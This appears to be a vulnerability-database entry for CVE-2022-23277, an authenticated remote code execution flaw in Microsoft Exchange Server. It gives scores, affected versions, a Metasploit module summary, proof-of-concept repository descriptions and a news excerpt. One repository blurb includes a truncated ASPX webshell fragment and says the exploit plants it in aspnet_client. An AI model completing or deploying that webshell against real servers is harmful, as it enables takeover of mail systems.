CVE-2022-23277

Published: 09/03/2022 Updated: 29/06/2023
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 578
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

Microsoft Exchange Server Remote Code Execution Vulnerability

Vulnerable Product

microsoft exchange server 2013

microsoft exchange server 2016

microsoft exchange server 2019

Exploits

This Metasploit module exploits vulnerabilities within the ChainedSerializationBinder as used in Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and Exchange Server 2016 CU22, all prior to Mar22SU. Note that authentication is required to exploit these vulnerabilities ...

Github Repositories

CVE-2022-23277 POC to write a webshell to aspnet_client

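exch_CVE-2021-42321 This is the tool referred to in the 7bits security team article "DotNet Security: CVE-2022-23277 Vulnerability Reproduction". The authentication part has to be added manually through Burp Suite; after successful exploitation, 1aspx is written to aspnet_client. webshell: <%@ Page Language="JScript" Debug="true"%><%@Import Namespace="SystemIO"%><%FileWriteAllB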

Recent Articles

Microsoft patches critical remote-code-exec hole in Exchange Server and others
The Register • Jessica Lyons Hardcastle • 01 Jan 1970

And Adobe, SAP, Intel, AMD, Cisco, Google join in

Patch Tuesday Microsoft has addressed 71 security flaws, including three critical remote code execution vulnerabilities, in its monthly Patch Tuesday update. The IT giant is confident none of the bugs have been actively exploited. One of those critical RCEs is in Microsoft Exchange Server, and labeled CVE-2022-23277. It can be exploited by an authenticated user to "trigger malicious code in the context of the server's account through a network call," said Redmond. Yes, an attacker nee...